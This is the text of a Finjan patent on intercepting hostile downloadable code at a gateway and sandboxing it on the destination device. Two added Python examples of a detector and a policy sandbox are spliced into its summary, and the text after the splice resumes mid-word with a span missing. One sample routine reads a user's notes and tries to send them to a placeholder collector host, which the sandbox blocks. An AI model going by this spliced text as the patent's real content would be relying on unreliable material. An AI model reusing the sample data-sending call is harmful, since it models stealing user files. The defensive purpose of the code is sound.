(12) United States Patent
Edery et al.

(10) Patent No.: US 7,613,926 B2
(45) Date of Patent: *Nov. 3, 2009

(54) METHOD AND SYSTEM FOR PROTECTING A COMPUTER AND A NETWORK FROM HOSTILE DOWNLOADABLES

(75) Inventors: Yigal Mordechai Edery, Pardesia (IL); Nimrod Itzhak Vered, Goosh Tel-Mond (IL); David R. Kroll, San Jose, CA (US); Shlomo Touboul, Kefar-Haim (IL)

(73) Assignee: Finjan Software, Ltd, Netanya (IL)

(*) Notice: Subject to any disclaimer, the term of this patent is extended or adjusted under 35 U.S.C. 154(b) by 659 days. This patent is subject to a terminal disclaimer.

(21) Appl. No.: 11/370,114

(22) Filed: Mar. 7, 2006

(65) Prior Publication Data
US 2006/0149968 A1, Jul. 6, 2006

Related U.S. Application Data

(63) Continuation of application No. 09/861,229, filed on May 17, 2001, now Pat. No. 7,058,822, and a continuation-in-part of application No. 09/539,667, filed on Mar. 30, 2000, now Pat. No. 6,804,780, which is a continuation of application No. 08/964,388, filed on Nov. 6, 1997, now Pat. No. 6,092,194, said application No. 09/861,229 is a continuation-in-part of application No. 09/551,302, filed on Apr. 18, 2000, now Pat. No. 6,480,962.

(60) Provisional application No. 60/205,591, filed on May 17, 2000.

(51) Int. Cl.
G06F 21/24 (2006.01)
G06F 11/30 (2006.01)
H04L 9/00 (2006.01)
G06F 15/16 (2006.01)

(52) U.S. Cl.: 713/181; 713/175; 713/176; 726/24

(58) Field of Classification Search: None
See application file for complete search history.

(56) References Cited

U.S. PATENT DOCUMENTS

5,077,677 A      12/1991  Murphy et al.        706/62
5,359,659 A      10/1994  Rosenthal            726/24

(Continued)

FOREIGN PATENT DOCUMENTS

EP  1091276  4/2001
EP  1132796  9/2001

OTHER PUBLICATIONS

Zhong, et al., "Security in the Large: is Java's Sandbox Scalable?," Seventh IEEE Symposium on Reliable Distributed Systems, pp. 1-6, Oct. 1998.

(Continued)

Primary Examiner: Christopher A Revak
(74) Attorney, Agent, or Firm: King & Spalding LLP

(57) ABSTRACT

Protection systems and methods provide for protecting one or more personal computers ("PCs") and/or other intermittently or persistently network accessible devices or processes from undesirable or otherwise malicious operations of Java™ applets, ActiveX™ controls, JavaScript™ scripts, Visual Basic scripts, add-ins, downloaded/uploaded programs or other "Downloadables" or "mobile code" in whole or part. A protection engine embodiment provides, within a server, firewall or other suitable "re-communicator," for monitoring information received by the communicator, determining whether received information does or is likely to include executable code, and if so, causes mobile protection code (MPC) to be transferred to and rendered operable within a destination device of the received information, more suitably by forming a protection agent including the MPC, protection policies and a detected-Downloadable. An MPC embodiment further provides, within a Downloadable-destination, for initiating the Downloadable, enabling malicious Downloadable operation attempts to be received by the MPC, and causing (predetermined) corresponding operations to be executed in response to the attempts, more suitably in conjunction with protection policies.

30 Claims, 10 Drawing Sheets
`BLUE COAT SYSTEMS - Exhibit 1011
`
`
`
U.S. PATENT DOCUMENTS

5,361,359 A      11/1994  Tajalli et al.       726/23
5,414,833 A       5/1995  Hershey et al.       726/22
5,485,409 A       1/1996  Gupta et al.         726/25
5,485,575 A       1/1996  Chess et al.         714/38
5,572,643 A      11/1996  Judson               709/218
5,579,509 A      11/1996  Furtney et al.       703/27
5,606,668 A *     2/1997  Shwed                726/13
5,623,600 A *     4/1997  Ji et al.            726/24
5,638,446 A       6/1997  Rubin                705/51
5,675,711 A      10/1997  Kephart et al.       706/12
5,692,047 A      11/1997  McManis              713/167
5,692,124 A      11/1997  Holden et al.        726/2
5,720,033 A       2/1998  Deo                  726/2
5,724,425 A       3/1998  Chang et al.         705/52
5,740,248 A       4/1998  Fieres et al.        713/156
5,740,441 A       4/1998  Yellin et al.        717/134
5,761,421 A       6/1998  van Hoff et al.      709/223
5,765,205 A       6/1998  Breslau et al.       711/203
5,784,459 A       7/1998  Devarakonda et al.   713/165
5,796,952 A       8/1998  Davis et al.         709/224
5,805,829 A       9/1998  Cohen et al.         709/202
5,832,208 A      11/1998  Chen et al.          726/24
5,832,274 A      11/1998  Cutler et al.        717/171
5,850,559 A      12/1998  Angelo et al.        713/320
5,859,966 A       1/1999  Hayman et al.        726/23
5,864,683 A       1/1999  Boebert et al.       709/249
5,881,151 A       3/1999  Yamamoto             726/24
5,884,033 A       3/1999  Duvall et al.        709/206
5,892,904 A       4/1999  Atkinson et al.      726/22
5,951,698 A       9/1999  Chen et al.          714/38
5,956,481 A       9/1999  Walsh et al.         726/23
5,963,742 A      10/1999  Williams             717/143
5,974,549 A      10/1999  Golan
5,978,484 A      11/1999  Apperson et al.      705/54
5,983,348 A      11/1999  Ji
5,987,611 A      11/1999  Freund               726/4
6,088,801 A       7/2000  Grecsek              726/1
6,088,803 A       7/2000  Tso et al.           726/22
6,092,194 A *     7/2000  Touboul              726/24
6,154,844 A *    11/2000  Touboul et al.       726/24
6,167,520 A      12/2000  Touboul
6,339,829 B1      1/2002  Beadle et al.        726/15
6,425,058 B1      7/2002  Arimilli et al.      711/134
6,434,668 B1      8/2002  Arimilli et al.      711/128
6,434,669 B1      8/2002  Arimilli et al.      711/128
6,480,962 B1 *   11/2002  Touboul              726/22
6,487,666 B1     11/2002  Shanklin et al.      726/23
6,519,679 B2      2/2003  Devireddy et al.     711/114
6,598,033 B2      7/2003  Ross et al.          706/46
6,732,179 B1 *    5/2004  Brown et al.         709/229
6,804,780 B1 *   10/2004  Touboul              713/181
6,901,519 B1 *    5/2005  Stewart et al.       726/24
6,917,953 B2      7/2005  Simon et al.         707/204
7,058,822 B2 *    6/2006  Edery et al.         726/22
7,093,135 B1 *    8/2006  Radatti et al.       713/188
7,210,041 B1      4/2007  Gryaznov et al.      713/188
7,343,604 B2      3/2008  Grabarnik et al.     719/313
7,418,731 B2      8/2008  Touboul              726/22
2004/0073811 A1   4/2004  Sanin                726/13
2004/0088425 A1   5/2004  Rubinstein et al.    709/230
2005/0172338 A1   8/2005  Sandu et al.         726/22
2006/0031207 A1   2/2006  Bjarnestam et al.    707/3
`
OTHER PUBLICATIONS

Rubin, et al., "Mobile Code Security," IEEE Internet, pp. 30-34, Dec. 1998.
Schmid, et al. "Protecting Data From Malicious Software," Proceedings of the 18th Annual Computer Security Applications Conference, pp. 1-10, 2002.
Corradi, et al., "A Flexible Access Control Service for Java Mobile Code," IEEE, pp. 356-365, 2000.
International Search Report for Application No. PCT/IB97/01626, 3 pp., May 14, 1998 (mailing date).
International Search Report for Application No. PCT/IL05/00915, 4 pp., dated Mar. 3, 2006.
Written Opinion for Application No. PCT/IL05/00915, 5 pp., dated Mar. 3, 2006 (mailing date).
International Search Report for Application No. PCT/IB01/01138, 4 pp., Sep. 20, 2002 (mailing date).
International Preliminary Examination Report for Application No. PCT/IB01/01138, 2 pp., dated Dec. 19, 2002.
Gerzic, Amer, "Write Your Own Regular Expression Parser," Nov. 17, 2003, 18 pp.
Power, James, "Lexical Analysis," 4 pp., May 14, 2006.
Sitaker, Kragen, "Rapid Genetic Evolution of Regular Expressions" [online], The Mial Archive, Apr. 24, 2004 (retrieved on Dec. 7, 2004), 5 pp.
"Lexical Analysis: DFA Minimization & Wrap Up" [online], Fall, 2004 [retrieved on Mar. 2, 2005], 8 pp.
"Minimization of DFA" [online], [retrieved on Dec. 7, 2004], 7 pp.
"Algorithm: NFS -> DFA" [online], Copyright 1999-2001 [retrieved on Dec. 7, 2004], 4 pp.
"CS 3813: Introduction to Formal Languages and Automata-State Minimization and Other Algorithms for Finite Automata," 3 pp., May 11, 2003.
Watson, Bruce W., "Constructing Minimal Acyclic Deterministic Finite Automata," [retrieved on Mar. 20, 2005], 38 pp.
Chang, Chia-Hsiang, "From Regular Expressions to DFA's Using Compressed NFA's," Oct. 1992, 243 pp.
"Products," Articles published on the Internet, "Revolutionary Security for a New Computing Paradigm" regarding SurfinGate™, 7 pp.
"Release Notes for the Microsoft ActiveX Development Kit," Aug. 13, 1996, pp. 1-10.
Doyle, et al., "Microsoft Press Computer Dictionary," Microsoft Press, 2d Edition, pp. 137-138, 1993.
Finjan Software Ltd., "Powerful PC Security for the New World of Java™ and Downloadables, Surfin Shield™," Article published on the Internet by Finjan Software Ltd., 2 pp. 1996.
Finjan Software Ltd., "Finjan Announces a Personal Java™ Firewall for Web Browsers-the SurfinShield™ 1.6 (formerly known as SurfinBoard)," Press Release of Finjan Releases SurfinShield 1.6, 2 pp., Oct. 21, 1996.
Finjan Software Ltd., "Finjan Announces Major Power Boost and New Features for SurfinShield™ 2.0," Las Vegas Convention Center/Pavillion 5 P5551, 3 pp., Nov. 18, 1996.
Finjan Software Ltd., "Finjan Software Releases SurfinBoard, Industry's First JAVA Security Product for the World Wide Web," Article published on the Internet by Finjan Software Ltd., 1 p., Jul. 29, 1996.
Finjan Software Ltd., "Java Security: Issues & Solutions," Article published on the Internet by Finjan Software Ltd., 8 pp. 1996.
Finjan Software Ltd., Company Profile, "Finjan-Safe Surfing, The Java Security Solutions Provider," Article published on the Internet by Finjan Software Ltd., 3 pp., Oct. 31, 1996.
"IBM AntiVirus User's Guide, Version 2.4,", International Business Machines Corporation, pp. 6-7, Nov. 15, 1995.
Khare, R., "Microsoft Authenticode Analyzed" [online], Jul. 22, 1996 [retrieved on Jun. 25, 2003], 2 pp.
LaDue, M., Online Business Consultant: Java Security: Whose Business is It?, Article published on the Internet, Home Page Press, Inc., 4 pp., 1996.
Leach, Norvin, et al., "IE 3.0 Applets Will Earn Certification," PC Week, vol. 13, No. 29, 2 pp., Jul. 22, 1996.
Moritz, R., "Why We Shouldn't Fear Java," Java Report, pp. 51-56, Feb. 1997.
Microsoft, "Microsoft ActiveX Software Development Kit" [Online], Aug. 12, 1996 [retrieved on Jun. 25, 2003], pp. 1-6.
Microsoft® Authenticode Technology, "Ensuring Accountability and Authenticity for Software Components on the Internet," Microsoft Corporation, Oct. 1996, including Abstract, Contents, Introduction, and pp. 1-10.
Microsoft Corporation, Web Page Article "Frequently Asked Questions About Authenticode," last updated Feb. 17, 1997, printed Dec. 23, 1998, pp. 1-13.
Okamoto, E., et al., "ID-Based Authentication System for Computer Virus Detection," IEEE/IEE Electronic Library online, Electronics Letters, vol. 26, Issue 15, ISSN 0013-5194, Jul. 19, 1990, Abstract and pp. 1169-1170.
Omura, J. K., "Novel Applications of Cryptography in Digital Communications," IEEE Communications Magazine, pp. 21-29, May 1990.
Schmitt, D.A., ".EXE files, OS-2 style," PC Tech Journal, vol. 6, No. 11, p. 76(13), Nov. 1988.
Zhang, X. N., "Secure Code Distribution," IEEE/IEE Electronic Library online, Computer, vol. 30, Issue 6, pp. 76-79, Jun. 1997.
D. Grune, et al., "Parsing Techniques: A Practical Guide," John Wiley & Sons, Inc., New York, New York, USA, pp. 1-326, 2000.

* cited by examiner
`
[Drawing sheet 1 of 10: FIG. 1a, FIG. 1b, FIG. 1c. Labels: Redundancy Support; Subsystem-1 (Sandbox Protected); Subsystem-N (Unprotected); Subsystem-M (Protected); ISP-Server; Server; Protection Engine (PE); MPC; User Device-n; Corporate Server. Reference numerals: 100, 104a, 104b, 140a, 142a, 143, 145, 145a.]
`
`
`
[Drawing sheet 2 of 10: FIG. 2 (system 200). Labels: Processor(s); Input Device(s); Output Device(s); Computer Readable Storage Medium; Computer Readable Storage Medium Reader; Communications Interface; Storage; Working Memory 209; Operating System 291; Other Programs 292.]
`
`
`
[Drawing sheet 3 of 10: FIG. 3 (system 300). Labels: Server; Firewall; Protection Engine (PE); Received Information (Non-Executable/Executable Info); Not Executable; XEQ; POL. Reference numerals: 301, 302, 303, 310, 320, 331, 340, 341, 342, 343.]
`
`
`
[Drawing sheet 4 of 10: FIG. 4 (400). Labels: Security/Authentication Policies; Not Executable (NXEQ); Policy/Authentication Reader; Transfer Engine; Storage; Protected Package Engine; Information Monitor; NXEQ; XEQ; User, policy, interfacing or other information. Reference numerals: 401, 403, 404, 406, 407, 431, 432, 433.]
`
`
`
[Drawing sheet 5 of 10: FIG. 5, FIG. 6a, FIG. 6b. Labels: Control; To Trans Engine; Agent Generator; To Linking Engine; Detector; Binary Detector; Pattern Detector; Other; Parser. Reference numerals: 405, 421, 504, 505, 506, 551, 552, 553, 601, 602.]
`
`
`
[Drawing sheet 6 of 10: FIG. 7a, FIG. 7b, FIG. 8. Labels in FIG. 7a and FIG. 7b: Protection Agent; Memory Space-N; Memory Space-P1. Reference numerals: 340, 341, 342, 700, 701, 702, 703, 704. FIG. 8 elements: Package Extractor 801; Executable Installer 802; Sandbox Engine Installer 803; Resource Access Diverter 804; Resource Access Analyzer 805; Policy Enforcer 806; MPC De-Installer 807.]
`
`
`
[Drawing sheet 7 of 10: FIG. 9 (flowchart). Legible steps:
- Monitor re-communicator (e.g. server) operation
- Receive information having a protected information destination (a "potential-Downloadable")
- Form a protection agent corresp. to mobile protection code, potential-Downloadable (now a detected-Downloadable) + any protection policies
- Cause the protection agent to be delivered to the information-destination
- Prevent current delivery
- Cause potential-Downloadable to be delivered to the information-destination ("No" branch)
Reference numerals: 901, 903, 905, 909, 911, 913, 915, 919, 921.]
`
`
`
[Drawing sheet 8 of 10: FIG. 10A (step 913) and FIG. 10B (step 919).
FIG. 10A:
- 1001: Determine whether the potential-Downloadable indicates an executable file type
- 1003: Determine whether the file contents include binary information or code patterns
- 1005: If steps 1001 and 1003 indicate that the potential-Downloadable more likely includes executable code, consider the potential-Downloadable a detected-Downloadable
FIG. 10B:
- 1011: Retrieve protection parameters and form mobile protection code according to the parameters
- Retrieve protection parameters and form protection policies according to the parameters
- 1015: Couple the mobile protection code, protection policies and received-information to form a protection agent (e.g. MPC first, policies second, and RI third)]
`
`
`
[Drawing sheet 9 of 10: FIG. 11 (flowchart). Legible steps:
- Install mobile protection code elements and policies within a destination device
- Load the Downloadable without actually initiating it
- Form an access interceptor for intercepting Downloadable destination device access attempts within the destination device
- Initiate the Downloadable within the destination device
- Determine policies in accordance with the access attempt
- Execute the policies (including causing an allowable response expected by the Downloadable to be returned to the Downloadable)
Reference numerals: 1101, 1102, 1103.]
`
`
`
[Drawing sheet 10 of 10: FIG. 12a (step 1103) and FIG. 12b (step 1109).
FIG. 12a:
- 1201: Install the Downloadable
- 1203: Modify the Downloadable API to divert malicious access requests to the mobile protection code
FIG. 12b:
- 1211: Receive a Downloadable access request via the modified API
- 1213: Query stored policies to determine a policy corresponding to the Downloadable access request]
`
`
`
METHOD AND SYSTEM FOR PROTECTING A COMPUTER AND A NETWORK FROM HOSTILE DOWNLOADABLES

PRIORITY REFERENCE TO RELATED APPLICATIONS

This application is a continuation of assignee's application Ser. No. 09/861,229, filed on May 17, 2001, now U.S. Pat. No. 7,058,822, entitled "Malicious Mobile Code Runtime Monitoring System And Methods", which is hereby incorporated by reference. U.S. application Ser. No. 09/861,229 claims benefit of provisional application Ser. No. 60/205,591, entitled "Computer Network Malicious Code Run-time Monitoring," filed on May 17, 2000 by inventors Nimrod Itzhak Vered, et al., which is hereby incorporated by reference. U.S. application Ser. No. 09/861,229 is also a Continuation-In-Part of U.S. patent application Ser. No. 09/539,667, entitled "System and Method for Protecting a Computer and a Network From Hostile Downloadables" filed on Mar. 30, 2000 by inventor Shlomo Touboul, now U.S. Pat. No. 6,804,780, and hereby incorporated by reference, which is a continuation of assignee's patent application U.S. Ser. No. 08/964,388, filed on Nov. 6, 1997, now U.S. Pat. No. 6,092,194, also entitled "System and Method for Protecting a Computer and a Network from Hostile Downloadables" and hereby incorporated by reference. U.S. Ser. No. 09/861,229 is also a Continuation-In-Part of U.S. patent application Ser. No. 09/551,302, entitled "System and Method for Protecting a Client During Runtime From Hostile Downloadables", filed on Apr. 18, 2000 by inventor Shlomo Touboul, now U.S. Pat. No. 6,480,962, which is hereby incorporated by reference.

BACKGROUND OF THE INVENTION

1. Field of the Invention

This invention relates generally to computer networks, and more particularly provides a system and methods for protecting network-connectable devices from undesirable downloadable operation.

2. Description of the Background Art

Advances in networking technology continue to impact an increasing number and diversity of users. The Internet, for example, already provides to expert, intermediate and even novice users the informational, product and service resources of over 100,000 interconnected networks owned by governments, universities, nonprofit groups, companies, etc. Unfortunately, particularly the Internet and other public networks have also become a major source of potentially system-fatal or otherwise damaging computer code commonly referred to as "viruses."

Efforts to forestall viruses from attacking networked computers have thus far met with only limited success at best. Typically, a virus protection program designed to identify and remove or protect against the initiating of known viruses is installed on a network firewall or individually networked computer. The program is then inevitably surmounted by some new virus that often causes damage to one or more computers. The damage is then assessed and, if isolated, the new virus is analyzed. A corresponding new virus protection program (or update thereof) is then developed and installed to combat the new virus, and the new program operates successfully until yet another new virus appears, and so on. Of course, damage has already typically been incurred.

To make matters worse, certain classes of viruses are not well recognized or understood, let alone protected against. It is observed by this inventor, for example, that Downloadable information comprising program code can include distributable components (e.g. Java™ applets and JavaScript scripts, ActiveX™ controls, Visual Basic, add-ins and/or others). It can also include, for example, application programs, Trojan horses, multiple compressed programs such as zip or meta files, among others. U.S. Pat. No. 5,983,348 to Shuang, however, teaches a protection system for protecting against only distributable components including "Java applets or ActiveX controls", and further does so using resource intensive and high bandwidth static Downloadable content and operational analysis, and modification of the Downloadable component; Shuang further fails to detect or protect against additional program code included within a tested Downloadable. U.S. Pat. No. 5,974,549 to Golan teaches a protection system that further focuses only on protecting against ActiveX controls and not other distributable components, let alone other Downloadable types. U.S. Pat. No. 6,167,520 to Touboul enables more accurate protection than Shuang or Golan, but lacks the greater flexibility and efficiency taught herein, as do Shuang and Golan.

Accordingly, there remains a need for efficient, accurate and flexible protection of computers and other network connectable devices from malicious Downloadables.

SUMMARY OF THE INVENTION

The present invention provides protection systems and methods capable of protecting a personal computer ("PC") or other persistently or even intermittently network accessible devices or processes from harmful, undesirable, suspicious or other "malicious" operations that might otherwise be effectuated by remotely operable code. While enabling the capabilities of prior systems, the present invention is not nearly so limited, resource intensive or inflexible, and yet enables more reliable protection. For example, remotely operable code that is protectable against can include downloadable application programs, Trojan horses and program code groupings, as well as software "components", such as Java™ applets, ActiveX™ controls, JavaScript™/Visual Basic scripts, add-ins, etc., among others. Protection can also be provided in a distributed interactively, automatically or mixed configurable manner using protected client, server or other parameters, redirection, local/remote logging, etc., and other server/client based protection measures can also be separately and/or interoperably utilized, among other examples.

In one aspect, embodiments of the invention provide for determining, within one or more network "servers" (e.g. firewalls, resources, gateways, email relays or other devices/processes that are capable of receiving-and-transferring a Downloadable) whether received information includes executable code (and is a "Downloadable"). Embodiments also provide for delivering static, configurable and/or extensible remotely operable protection policies to a Downloadable-destination, more typically as a sandboxed package including the mobile protection code, downloadable policies and one or more received Downloadables. Further client-based or remote protection code/policies can also be utilized in a distributed manner. Embodiments also provide for causing the mobile protection code to be executed within a Downloadable-destination in a manner that enables various Downloadable operations to be detected, intercepted or further responded to via protection operations. Additional server/information-destination device security or other protection is also enabled, among still further aspects.
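
The gateway-side flow described above (decide whether received information contains executable code, then send it on wrapped with mobile protection code and policies) is modeled below. This is an added example, not code from the patent: the extension list, magic-byte table, script patterns, the rule that any one signal is enough, and the length-prefixed `PAGT` framing are assumptions; only the MPC, policies, received-information ordering is taken from FIG. 10B.

```python
import json
import os
import struct

# Assumed signal tables: the patent names a file-type check, a binary check
# and a code-pattern check but does not list their contents.
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".ocx", ".class", ".jar", ".js", ".vbs"}
BINARY_MAGIC = {
    b"MZ": "PE/DOS header",
    b"\x7fELF": "ELF header",
    b"\xca\xfe\xba\xbe": "Java class header",
    b"PK\x03\x04": "zip container",
}
CODE_PATTERNS = (b"<script", b"<applet", b"<object", b"createobject(")

AGENT_MAGIC = b"PAGT"  # hypothetical framing tag used only in this example


def detect_executable(filename, data):
    """Return the reasons the content looks executable (empty list = inert)."""
    reasons = []
    ext = os.path.splitext(filename)[1].lower()
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append("file type: " + ext)
    for magic, label in BINARY_MAGIC.items():
        if data.startswith(magic):
            reasons.append("binary: " + label)
    lowered = data[:65536].lower()  # scan a bounded prefix, case-insensitively
    for pattern in CODE_PATTERNS:
        if pattern in lowered:
            reasons.append("pattern: " + pattern.decode())
    return reasons


def form_protection_agent(mpc, policies, received):
    """Couple MPC, policies and received information, in that order."""
    policy_bytes = json.dumps(policies, sort_keys=True).encode()
    parts = (mpc, policy_bytes, received)
    return AGENT_MAGIC + b"".join(struct.pack(">I", len(p)) + p for p in parts)


def split_protection_agent(agent):
    """Destination-side inverse; rejects truncated input and trailing bytes."""
    if not agent.startswith(AGENT_MAGIC):
        raise ValueError("not a protection agent")
    offset, parts = len(AGENT_MAGIC), []
    for _ in range(3):
        if offset + 4 > len(agent):
            raise ValueError("truncated length field")
        (length,) = struct.unpack_from(">I", agent, offset)
        offset += 4
        if offset + length > len(agent):
            raise ValueError("truncated segment")
        parts.append(agent[offset:offset + length])
        offset += length
    if offset != len(agent):
        raise ValueError("trailing bytes after third segment")
    mpc, policy_bytes, received = parts
    return mpc, json.loads(policy_bytes), received


def recommunicate(filename, data, mpc, policies):
    """Gateway decision: pass inert data through, wrap anything executable."""
    reasons = detect_executable(filename, data)
    if not reasons:
        return "passthrough", data, reasons
    return "protection-agent", form_protection_agent(mpc, policies, data), reasons


# Constructed sample inputs (not from the patent).
SAMPLE_MPC = b"<mobile protection code placeholder>"
SAMPLE_POLICIES = {"file.write": "deny", "net.connect": "ask-user"}
RENAMED_PE = b"MZ\x90\x00" + b"\x00" * 60   # PE header bytes behind a .txt name
PLAIN_TEXT = b"Quarterly figures attached.\n"

if __name__ == "__main__":
    for name, body in (("notes.txt", PLAIN_TEXT), ("report.txt", RENAMED_PE)):
        action, out, why = recommunicate(name, body, SAMPLE_MPC, SAMPLE_POLICIES)
        print(name, action, len(out), why)
```

The `report.txt` case shows why the content checks matter: the file name looks inert, but the leading bytes still cause the payload to be wrapped.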

tor" for enabling further up/downloading of one or more further "modules" or other information (e.g. events, user/user device information, etc.).

Another method according to an embodiment of the invention includes installing, within a user device, received mobile protection code ("MPC") and protection policies in conjunction with the user device receiving a downloadable application program, component or other Downloadable(s). The method also includes determining, by the MPC, a resource access attempt by the Downloadable, and initiating, by the MPC, one or more predetermined operations corresponding to the attempt. (Predetermined operations can, for example, comprise initiating user, administrator, client, network or protection system determinable operations, including but not limited to modifying the Downloadable operation, extricating the Downloadable, notifying a user/another, maintaining a local/remote log, causing one or more MPCs/policies to be downloaded, etc.)

Advantageously, systems and methods according to embodiments of the invention enable potentially damaging, undesirable or otherwise malicious operations by even unknown mobile code to be detected, prevented, modified and/or otherwise protected against without modifying the mobile code. Such protection is further enabled in a manner that is capable of minimizing server and client resource requirements, does not require pre-installation of security code within a Downloadable-destination, and provides for client specific or generic and readily updateable security measures to be flexibly and efficiently implemented. Embodiments further provide for thwarting efforts to bypass security measures (e.g. by "hiding" undesirable operation causing information within apparently inert or otherwise "friendly" downloadable information) and/or dividing or combining security measures for even greater flexibility and/or efficiency.

Embodiments also provide for determining protection policies that can be downloaded and/or ascertained from other security information (e.g. browser settings, administrative policies, user input, uploaded information, etc.). Different actions in response to different Downloadable operations, clients, users and/or other criteria are also enabled, and embodiments provide for implementing other security measures, such as verifying a downloadable source, certification, authentication, etc. Appropriate action can also be accomplished automatically (e.g. programmatically) and/or in conjunction with alerting one or more users/administrators, utilizing user input, etc. Embodiments further enable desirable Downloadable operations to remain substantially unaffected, among other aspects.

A protection engine according to an embodiment of the invention is operable within one or more network servers, firewalls or other network connectable information re-communicating devices (as are referred to herein summarily one or more "servers" or "re-communicators"). The protection engine includes an information monitor for monitoring information received by the server, and a code detection engine for determining whether the received information includes executable code. The protection engine also includes a packaging engine for causing a sandboxed package, typically including mobile protection code and downloadable protection policies to be sent to a Downloadable-destination in conjunction with the received information, if the received information is determined to be a Downloadable.

A sandboxed package according to an embodiment of the invention is receivable by and operable with a remote Downloadable-destination. The sandboxed package includes mobile protection code ("MPC") for causing one or more predetermined malicious operations or operation combinations of a Downloadable to be monitored or otherwise intercepted. The sandboxed package also includes protection policies (operable alone or in conjunction with further Downloadable-destination stored or received policies/MPCs) for causing one or more predetermined operations to be performed if one or more undesirable operations of the Downloadable is/are intercepted. The sandboxed package can also include a corresponding Downloadable and can provide for initiating the Downloadable in a protective "sandbox". The MPC/policies can further include a communicator for enabling further MPC/policy information or "modules" to be utilized and/or for event logging or other purposes.

A sandbox protection system according to an embodiment of the invention comprises an installer for enabling a received MPC to be executed within a Downloadable-destination (device/process) and further causing a Downloadable application program, distributable component or other received downloadable code to be received and installed within the Downloadable-destination. The protection system also includes a diverter for monitoring one or more operation attempts of the Downloadable, an operation analyzer for determining one or more responses to the attempts, and a security enforcer for effectuating responses to the monitored operations. The protection system can further include one or more security policies according to which one or more protection system elements are operable automatically (e.g. programmatically) or in conjunction with user intervention (e.g. as enabled by the security enforcer). The security policies can also be configurable/extensible in accordance with further downloadable and/or Downloadable-destination information.
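
The diverter, operation analyzer and security enforcer described above are modeled here as three cooperating pieces around a stand-in resource interface. This is an added example, not code from the patent: `ResourceApi`, the rule format, the `fake` action (standing in for FIG. 11's "allowable response expected by the Downloadable") and the sample Downloadable are assumptions, and the in-process wrapper models the control flow only, not an isolation boundary.

```python
class ResourceApi:
    """In-memory stand-in for the destination's real resource interface."""

    def __init__(self):
        self.files = {"/home/user/notes.txt": b"meeting at 10"}
        self.sent = []

    def read_file(self, path):
        return self.files[path]

    def write_file(self, path, data):
        self.files[path] = data
        return len(data)

    def net_send(self, host, data):
        self.sent.append((host, data))
        return len(data)


# Value a caller expects back from each operation. Used when a policy says
# "fake": the Downloadable keeps running but the resource is never touched.
EXPECTED_RESPONSE = {
    "read_file": lambda path: b"",
    "write_file": lambda path, data: len(data),
    "net_send": lambda host, data: len(data),
}


def analyze(policies, operation, args):
    """Operation analyzer: first matching rule wins, no match means deny."""
    subject = str(args[0]) if args else ""
    for rule in policies:
        if rule["op"] == operation and subject.startswith(rule["prefix"]):
            return rule["action"]
    return "deny"


def enforce(action, target, operation, args, log):
    """Security enforcer: carry out the decision and record it."""
    if action == "fake" and operation not in EXPECTED_RESPONSE:
        action = "deny"  # no safe stand-in response is known
    log.append((operation, args[0] if args else None, action))
    if action == "allow":
        return target(*args)
    if action == "fake":
        return EXPECTED_RESPONSE[operation](*args)
    raise PermissionError(operation + " blocked by policy")


class Diverter:
    """Diverter: the only object the Downloadable is handed."""

    def __init__(self, real_api, policies, log):
        self._real, self._policies, self._log = real_api, policies, log

    def __getattr__(self, operation):
        if operation.startswith("_"):
            raise AttributeError(operation)
        target = getattr(self._real, operation, None)
        if not callable(target):  # hide data attributes such as .files
            raise AttributeError(operation)

        def diverted(*args):
            action = analyze(self._policies, operation, args)
            return enforce(action, target, operation, args, self._log)

        return diverted


def run_sandboxed(downloadable, policies):
    """Installer plus initiation: wire the diverter in, then start the code."""
    api, log = ResourceApi(), []
    result = downloadable(Diverter(api, policies, log))
    return result, api, log


# Constructed policy set and sample Downloadable (not from the patent).
POLICIES = [
    {"op": "read_file", "prefix": "/home/user/notes", "action": "allow"},
    {"op": "write_file", "prefix": "/tmp/", "action": "allow"},
    {"op": "write_file", "prefix": "/home/", "action": "fake"},
    {"op": "net_send", "prefix": "", "action": "deny"},
]


def sample_downloadable(api):
    note = api.read_file("/home/user/notes.txt")
    api.write_file("/tmp/cache.bin", note)
    wrote = api.write_file("/home/user/.profile", b"changed")
    try:
        api.net_send("collector.example", note)
        sent = True
    except PermissionError:
        sent = False
    return wrote, sent


if __name__ == "__main__":
    result, api, log = run_sandboxed(sample_downloadable, POLICIES)
    print(result, sorted(api.files), api.sent)
    for event in log:
        print(event)
```

The faked write returns the byte count the caller expects while leaving the protected path untouched, so the log still records the attempt for later review.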

A method according to an embodiment of the invention includes receiving downloadable information, determining whether the downloadable information includes executable code, and causing a mobile protection code and security policies to be communicated to a network client in conjunction with security policies and the downloadable information if the downloadable information is determined to include executable code. The de